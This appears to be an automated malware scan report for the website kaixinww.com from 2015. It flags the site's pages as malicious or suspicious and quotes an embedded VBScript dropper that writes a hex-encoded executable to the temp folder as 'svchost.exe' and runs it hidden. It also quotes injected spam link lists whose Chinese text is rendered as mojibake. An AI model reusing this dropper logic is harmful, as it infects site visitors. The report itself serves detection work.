Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kaixinww.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kaixinww.com/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:04 GMT Accept-Ranges: bytes ETag: "98d4667da023d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 124170 Content-Location: http://kaixinww.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 19:48:59 GMT | clean |
http://kaixinww.com/index.html | 200 OK Content-Length: 124170 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://kaixinww.com/html/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:07 GMT Accept-Ranges: bytes ETag: "4e5fe1fc529d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135733 Content-Location: http://kaixinww.com/html/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 15:25:54 GMT | clean |
http://kaixinww.com/html/index.html | 200 OK Content-Length: 135733 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: idiaoci.com ...[1053 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://idiaoci.com/items/">»ªÁļ¤ÇéÊÓƵÁÄÌìÍø</a></li> <li><a href="http://beijing-ascc.com/mtope/">ÏÓÌÙ±¾ÔÃÄÐ ÌÙ±¾ÀòÄÈ</a></li> <li><a href="http://fuliangma.com/content/">Ö±²åʦÃÃ</a></li> <li><a href="http://tlyazy.com/mtope/">¿ì²¥Å·ÃÀ¼«Æ·Ë«·ÉµçÓ°</a></li> <li><a href="http://gxsuncom.com/project/">º«¹ú¿ìÂײ¥Àí qvod</a></li> <li><a href="http://gsxysm.com/ ...[3391 bytes skipped]... | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://kaixinww.com/about/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:13 GMT Accept-Ranges: bytes ETag: "a84ff12b4029d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135206 Content-Location: http://kaixinww.com/about/index.html Content-Type: text/html Last-Modified: Mon, 05 Jan 2015 23:34:38 GMT | clean |
http://kaixinww.com/about/index.html | 200 OK Content-Length: 135206 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hslygj.com ...[1530 bytes skipped]... ;ÃÀÅ®ÈËÌåÒÕÊõÒõ²¿ÕÕ</a></li> <li><a href="http://aelkf.com/html/">ÈÕº«ÃÀŮдÕ漯ÊÓƵ</a></li> <li><a href="http://yixima.com/html/">°®g¤ì¤£µçÓ°</a></li> <li><a href="http://ssshzk.com/news/">С´¨¤¡¤µÃÀqvod ÖÐÎÄ</a></li> <li><a href="http://huanannews.com/companys/">ÂéÉúÎè</a></li> <li><a href="http://hslygj.com/html/">ÈËÌåÒÕÊõË¿Íàmm</a></li> <li><a href="http://nj5168.com/html/">³É¹¬ÁðÁ§ÖÖ×ÓËÑË÷</a></li> <li><a href="http://aetosas.com/project/">ÃÀ¹úÊ®´ÎÀ²×îеØÖ·</a></li> <li><a href="http://xiande56.com/content/">171×î´óµ¨ÈËÌåÒÕÊõͼƬ</a></li> <li><a href="http://lnsyyg.com/gbuks/">ÂéÉúÏ£²½±ø·¬ºÅ</a></li> <li><a href="http://bc2068.com/news/"> ...[2947 bytes skipped]... | ||
http://kaixinww.com/chanpin/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:17 GMT Accept-Ranges: bytes ETag: "ce5fbdc4492ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135126 Content-Location: http://kaixinww.com/chanpin/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 07:15:51 GMT | clean |
http://kaixinww.com/chanpin/index.html | 200 OK Content-Length: 135126 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hyjfqs.com ...[1141 bytes skipped]... ="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://dg-e.com/companys/">ÓÅÀæÓ°ÒôÏÈ·æ</a></li> <li><a href="http://hyjfqs.com/service/">É«ÇéͼƬ</a></li> <li><a href="http://njmeijie.com/companys/">www.48kkk.com</a></li> <li><a href="http://mwznk.com/guest/">СºüÀêÉ«ÇéÍøÕ¾</a></li> <li><a href="http://wapmdbzd.com/news/">ÂÒÂ×С˵ ÂÒÂ׹Ѹ¾</a></li> <li><a href="http://bbsai.cn/customer/">3gpµçÊÓ¾çÏÂÔØ</a></li> <li><a href="http://hyjfqs.com/html/">ÃÅÁ³·¿Ç©³ö×âºÏÍ ...[3326 bytes skipped]... | ||
http://kaixinww.com/news_cn/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:20 GMT Accept-Ranges: bytes ETag: "4a27c9a9ce2ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135978 Content-Location: http://kaixinww.com/news_cn/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 23:07:09 GMT | clean |
http://kaixinww.com/news_cn/index.html | 200 OK Content-Length: 135978 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ghds-ok.com ...[1055 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://ghds-ok.com/contact/">¶¯»Â×ÀíƬ</a></li> <li><a href="http://dg-e.com/guest/">qvod±ä̬</a></li> <li><a href="http://fswrmy.cn/news_cn/">ÃÀÀöСÒõµÀͼƬ</a></li> <li><a href="http://dgltzc.com/contact/">Å©´å±¬²Ù</a></li> <li><a href="http://xahkjc.com/project/">´ó³¡¤æ¤£ ÔÚÏß¿ì²¥</a></li> <li><a href="http://mklm8.com/about/">¿ªÐÄÎåÔÂÌìÅ®ÈË»ÆÉ«</a& ...[3432 bytes skipped]... | ||
http://kaixinww.com/contact/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:23 GMT Accept-Ranges: bytes ETag: "68f1f08c532bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135453 Content-Location: http://kaixinww.com/contact/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 14:58:24 GMT | clean |
http://kaixinww.com/contact/index.html | 200 OK Content-Length: 135453 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dftx.net ...[1118 bytes skipped]... t;a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://tkgouw.com/html/">Ó×Ïã¸ô</a></li> <li><a href="http://dftx.net/project/">ÎҺ͸ÉÂè·è¿ñµÄÐÔ°®</a></li> <li><a href="http://jm2012.com/trades/">¼§´¨ÀöÄȲ½±ø·¬ºÅ</a></li> <li><a href="http://imvich.com/chanpin/">ËÄ·¿²¥²¥qvod</a></li> <li><a href="http://whxjzj.com/project/">917mmm.com</a></li> <li><a href="http://fttao.com/trades/">ÆÕͨÔÖÐøС椱»ºÚÈËÃ͸É</a></li> <li><a href="http://cqyb888.com/html/">¹ ...[3358 bytes skipped]... | ||
http://kaixinww.com/guest/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:26 GMT Accept-Ranges: bytes ETag: "2e8db284d82bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135727 Content-Location: http://kaixinww.com/guest/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 06:50:13 GMT | clean |
http://kaixinww.com/guest/index.html | 200 OK Content-Length: 135727 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jst178.com ...[1256 bytes skipped]... div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://guozhenchuju.com/guest/">ÉÏÔÒ²½±øƬÔÚÏß</a></li> <li><a href="http://fswrmy.cn/trades/">¹²52¼¯²é¿´È«²¿¾ç¼¯</a></li> <li><a href="http://jst178.com/news/">У԰´ºÉ«ÐÔ°®Ð¡Ëµ</a></li> <li><a href="http://un114.cn/html/">5ÔÂÌìÉ«Çé</a></li> <li><a href="http://lelaide.com/companys/">ÓêºóС¹ÊÊÂͼ</a></li> <li><a href="http://gqweb.net/news/">ÈÕ±¾Èý¼¶µçÓ°ÏÂÔصØÖ·</a></li> <li><a href="http://xmfshs.com/news/">³¤Ô½áÒ qvod</a></li> <li><a href="http://gemahz.com/gbuks/">ɽ±¾ÃÀÔÂÖÖ×Ó</a&g ...[3230 bytes skipped]... | ||
http://kaixinww.com/guest/0.html | 200 OK Content-Length: 17086 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ayzxkm.com ...[1124 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://ayzxkm.com/customer/">ÇéÉ«ÎäÏÀС˵</a></li> <li><a href="http://mwznk.com/mtope/">±¾ÔóÅóÃÀ ´¦Å® ѸÀ×</a></li> <li><a href="http://fswrmy.cn/companys/">¼«Æ·³ÉÈËÓ°Ôº</a></li> <li><a href="http://gyjck.com/items/">Ëɾ®ÃÀÑ©ÔÚÏß</a></li> <li><a href="http://cqtbjp.com/contact/">¼¡Áä</a></li> <li><a href="http://gzjbdq.com/news/">Íâ¹úÒ»¼¶Æ¬</a></ ...[3074 bytes skipped]... | ||
http://kaixinww.com/news/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://kaixinww.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://kaixinww.com/items/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 17:46:36 GMT Accept-Ranges: bytes ETag: "769f6845da2bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135804 Content-Location: http://kaixinww.com/items/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 07:02:46 GMT | clean |
http://kaixinww.com/items/index.html | 200 OK Content-Length: 135804 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dftx.net ...[1147 bytes skipped]... href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://xinlimc.com.cn/mtope/">ÄÎ˼</a></li> <li><a href="http://dftx.net/news/">ãƷソ²»ÑÅÕÕÍêÕû°æ</a></li> <li><a href="http://sqsczs.com/items/">´ÌÅ®È˶ÇÆê</a></li> <li><a href="http://chinashenghuai.cn/news/">¿áÒ¹yingshi</a></li> <li><a href="http://dfcsjw.com/service/">33bbb.comÔÚÏßµçÓ°</a></li> <li><a href="http://dyhmjd.com/project/">ĸ×ÓÂÒÂ×С˵ȫ¼¯</a></li> <li><a href="http://xinlimc.com.cn/trades/">v. ...[3339 bytes skipped]... | ||
http://kaixinww.com/items/0.html | 200 OK Content-Length: 16878 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hyjfqs.com ...[1118 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://hyjfqs.com/news/">×ܲõÄ33ÈÕË÷ÇéäÌÐÂÍø</a></li> <li><a href="http://bjymjy.com/mtope/">www.ulinixcum</a></li> <li><a href="http://nkbjzx.com/about/">dz¾®ÎèÏ㠺ϼ¯ÏÂÔØ</a></li> <li><a href="http://keysae.com/html/">ÃÀ¹úµçÓ°³å¶¯ÏÂÔØ</a></li> <li><a href="http://hmaituan.com/items/">www.ppp13.com</a></li> <li><a href="http://jlny.net/news_cn/">ͬ־ÓïÒô ...[3074 bytes skipped]... | ||
http://kaixinww.com/items/1.html | 200 OK Content-Length: 16427 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ahitshop.com ...[1216 bytes skipped]... /contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://hljql.cn/news/">µç¿´óÈ«ÔõôÏÂÔØ</a></li> <li><a href="http://ahitshop.com/chanpin/">ÈËÈ®½»Ð¡Ëµ</a></li> <li><a href="http://xhmt18.com/gbuks/">www.bt667.com</a></li> <li><a href="http://steiffchina.cn/content/">×øÁ³É±ÈË</a></li> <li><a href="http://hfwsbz.com/items/">³õ»¨hatsuhana</a></li> <li><a href="http://bjzrjf.com/about/">www.tiantianyule</a></li> <li><a href="http://zhaipinpai.com/news/">Çó¸öaƬÍøÕ¾< ...[3143 bytes skipped]... | ||
http://kaixinww.com/news/3283.html | 200 OK Content-Length: 16309 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bjyadu.com ...[1316 bytes skipped]... <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://axghn.cn/content/">¶¥¼¶ÈËÌåÒÕÊõÊÓƵ</a></li> <li><a href="http://kmczgg.com/mtope/">Å·ÃÀÈËÌåÎ÷Î÷ÈËÌåÒÕÊõ</a></li> <li><a href="http://bjyadu.com/news_cn/">û´©Ò·þÅ®ÉúͼƬ</a></li> <li><a href="http://hishun.cn/mtope/">àíÊöÎҵĵÚÒ»´Î</a></li> <li><a href="http://dzjxbz.com/items/">лÄÈ΢²©Ð´ÁõìÇ</a></li> <li><a href="http://lffqjr.com/service/">·Ç½Íø ±¡ÖÜÁªÊÖ</a></li> <li><a href="http://gylgy.com/gbuks/">Å®È˶µ×ÕÕ</a></li> <li><a href="http://kw123.net/news/">ÁõÓñÖù·áÐØ</a&g ...[3056 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kaixinww.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 17:46:04 GMT
Accept-Ranges: bytes
ETag: "98d4667da023d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 124170
Content-Location: http://kaixinww.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:48:59 GMT
...124170 bytes of data.
GET / HTTP/1.1
Host: kaixinww.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 17:46:04 GMT
Accept-Ranges: bytes
ETag: "98d4667da023d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 124170
Content-Location: http://kaixinww.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:48:59 GMT
...124170 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kaixinww.com
Referer: http://www.google.com/search?q=kaixinww.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kaixinww.com
Referer: http://www.google.com/search?q=kaixinww.com
Result:
The result is similar to the first query. There are no suspicious redirects found.